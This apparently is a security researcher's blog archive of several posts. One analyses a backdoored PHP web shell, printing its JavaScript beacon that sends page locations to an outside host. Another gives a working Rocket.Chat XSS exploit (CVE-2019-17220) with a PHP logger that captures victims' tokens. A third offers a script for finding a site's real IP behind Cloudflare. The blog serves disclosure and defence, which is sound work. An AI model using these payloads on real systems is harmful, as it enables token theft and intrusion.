Tuesday, August 18, 2020

How Hackers Be Victim: Backdoor in PHP web shells

I decided to decode a PHP web shell that encoded by Fopo online encoder, it called "ATTACK SHELL PRiV9" or "K2ll33d Shell 2019" belong to "r00t.info".

PHP web shell:

Encoded source:

it might be interesting to you what we encounter!?

as you see it contains backdoor malware that copies itself with newsr.php in all directory of the website and sends a location and info to the address "http://r00t.info/ccb.js" and the mail: "byhero44@gmail.com" with the password "a4cd2905b660e8b1bc73a7c4571252da" that encrypted with the MD5 algorithm.

ccb.js contain:

a=new/**/Image();a.src='http://www.expoilt.com/yaz.php?a='+escape(location.href);

I changed all Http to Hxxp to prevent execute and harm your system, so if you want to run you need to back values to the original.

another name and address are: 

Turkey Cyber Army team

https://expoilt.com/yaz.php?a=

http://r00t.info/txt/lamer.txt

k2ll33d

Indoxploit Shell

Sym Bypass 403 Shell

Berandal Indoxploit Shell V2.1

Premium Wso Shell

Whmcs Killer

Mobile Shell V.05 2018 Private

K2ll33d Shell

3turr ~ Sh311

Server V-8 Attack Shell

Bypass shell

Wordpress Mass Change Password 2019

Smevk_pathan Shell V3 Bypass Shell

Leaf Php Mailer V.2.7

Bloodsecurity Bypass Shell

Anon Priv9 Shell

Wso Shell

R00t.info Priv7 Shell New 2016

Wso Shell 4.2.2

G5 Private Bypass Shell

 

If you have used it, You need to know that your entire website is infected.

the solution to clean:

Look for "newsr.php" files on all of your directory website to remove it.

if you are using Linux use this command:

find / -name newsr.php -exec rm -rf {} \;

Also, if you have uploaded the file, delete it completely.

And even delete the CGI shell files that it created by the PHP web shell.

you can find full source code at https://pastebin.com/bmrrDeAb



Sunday, June 7, 2020

OWASP JoomScan Project in Pentestmag

our article published in Pentestmag




OWASP JoomScan Project
by Mohammad Reza Espargham, Ali Razmjoo, and Ehsan Nezami
JoomScan is not aiming just at testing different vulnerabilities and trying to simulate attacks, the process always begins with information gathering and it proceeds step by step following ethical hacking techniques. The information-gathering phase is not limited to the web application but also the webserver and domain, also misconfigurations, human-errors, and different possible risks on the product.

https://lnkd.in/dcwRNvD
other contributors Valerio Alessandroni, Marlene Ladendorff, PhD, Dr. Chuck Easttom, Daniel Benicio F Alves, LPIC, SUSE SCA, FORTINET NSE3, Kavya Pearlman ⚠️ Safety First ⚠️, Alex Halfin, Vinícius Vieira, Mostafa Mahmoud, Mohammad Reza Espargham, Ali Razmjoo, Ehsan Nezami, Ofer Tirosh, and Franciny S. hashtagpentest hashtagmagazine hashtagpentestmag hashtagActiveDirectory hashtagAD hashtagpentesting hashtagDDoS hashtagMachineLearning hashtagSplunk hashtagengineering hashtagnew hashtagedition hashtagcybersecurity hashtaginfosecurity hashtaginfosec

Wednesday, October 2, 2019

Rocket.Chat Cross Site Scripting CVE-2019-17220

Rocket.Chat versions prior to 2.1.0 suffer from a cross-site scripting vulnerability.

As I found out, the service has a security problem that will lead to the disclosure of user information.

Packet Storm
Mitre CVE
NIST
Exploit-DB



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server 


<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send payload with your web server url


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. Token will be written in logs.txt when target seen your message.

Friday, April 12, 2019

OWASP Honeypot

In our first test of the OWASP Honeypot with Ali Razmjoo, I am gonna say that among all attacks we are receiving, Russians are doing it smarter and more effective

API: API Docs:






Black Hat Asia 2019

Our OWASP Nettacker: Automated Penetration Testing Framework has been accepted for Black Hat Asia Arsenal 2019.

https://www.blackhat.com/asia-19/arsenal/schedule/index.html#owasp-nettacker-automated-penetration-testing-framework-14336


The OWASP Nettacker project was created to automate information gathering, vulnerability scanning, and eventually generating a report for networks, including services, bugs, vulnerabilities, misconfigurations, and other information. This software will utilize TCP SYN, ACK, ICMP and many other protocols in order to detect and bypass Firewall/IDS/IPS devices. By leveraging a unique method in OWASP Nettacker for discovering protected services and devices such as SCADA, it would make a competitive edge compared to other scanners, making it one of the best.




The Black Hat photographer has uploaded some pictures to Flickr; you can check them out, here: https://www.flickr.com/photos/blackhatevents/albums/72157707843897024



Saturday, November 10, 2018

Bypass Cloudflare To Get Real IP Address

What is CloudFlare

CloudFlare is one of the fastest growing CDN providers, which has free and premium service to accelerate, optimize & secure websites. There are more than 2,000,000 web properties powered by CloudFlare and I use their service too. If you are already using CloudFlare then you might have noticed IP address in DNS lookup get reflected with CloudFlare.

How this script works

this script is designed to discover the origin IP of a server that is behind Cloudflare,The work method of this script is to scan the NS of a domain,This tool only works to domains that are the domains of the original NS server This tool scans the default Private Name Server, and if they exist, they will find the original server IP

Example NS


ns1,"ns2","ns3","ns4","primary","host1","host2","masterdns","slavedns"
"dns1","dns2","master","slave","node1","node2"

Ping Test
With a ping of the domain, the Cloudflare fake IP is displayed :

C:\Users\root>ping cafeigapp.com

Pinging cafeigapp.com [172.64.197.10] with 32 bytes of data:
Reply from 172.64.197.10: bytes=32 time=153ms TTL=60
Reply from 172.64.197.10: bytes=32 time=150ms TTL=60
Reply from 172.64.197.10: bytes=32 time=149ms TTL=60
Reply from 172.64.197.10: bytes=32 time=155ms TTL=60

Ping statistics for 172.64.197.10:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 149ms, Maximum = 155ms, Average = 151ms

CloudFlare Bypasser script result The script has detected the original IP by scanning Name Server on port 80 and 53, real IP is 144.76.174.208


Enter your domain: cafeigapp.com
Starting...

[+] Open        ns1.cafeigapp.com                                 53    144.76.174.208
[+] Open        ns1.cafeigapp.com                                 80    144.76.174.208
[+] Open        ns2.cafeigapp.com                                 53    144.76.174.208
[+] Open        ns2.cafeigapp.com                                 80    144.76.174.208
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.

[*] Finished!

Cloudflare Bypasser Script:

Download script 


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
'''
    File name: Bypass Cloudflare To Get Real IP Address
    Author: Dariush Nasirpour (Net.Edit0r)
    Date created: 11/10/2018
    Web: http://nasirpour.info
    Spicial Thanks to Ehsan Nezami
'''

import socket

socket.setdefaulttimeout(1)

domain = raw_input("Enter your domain: ")

try:
    print "Starting...\n\r"
    dns = ["ns1.", "ns2.", "ns3.", "ns4.", "primary.", "host1.", "host2.", "masterdns.", "slavedns.", "dns1.", "dns2.",
           "master.", "slave.", "node1.", "node2."]
    for dns_name in dns:
        remoteServerIP = dns_name + domain
        for port in [53, 80]:
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                IP = socket.gethostbyname(remoteServerIP)
                result = sock.connect_ex((remoteServerIP, port))
                if result == 0:
                    print "[+] Open\t{:<50}{:<3}\t{}".format(remoteServerIP, port, IP)
                sock.close()
            except socket.gaierror:
                print "[-] Hostname could not be resolved."
                pass
            except socket.error:
                print "[-] Couldn't connect to server"
                pass
    print "\n[*] Finished!"
except KeyboardInterrupt:
    print "You pressed Ctrl+C"
    pass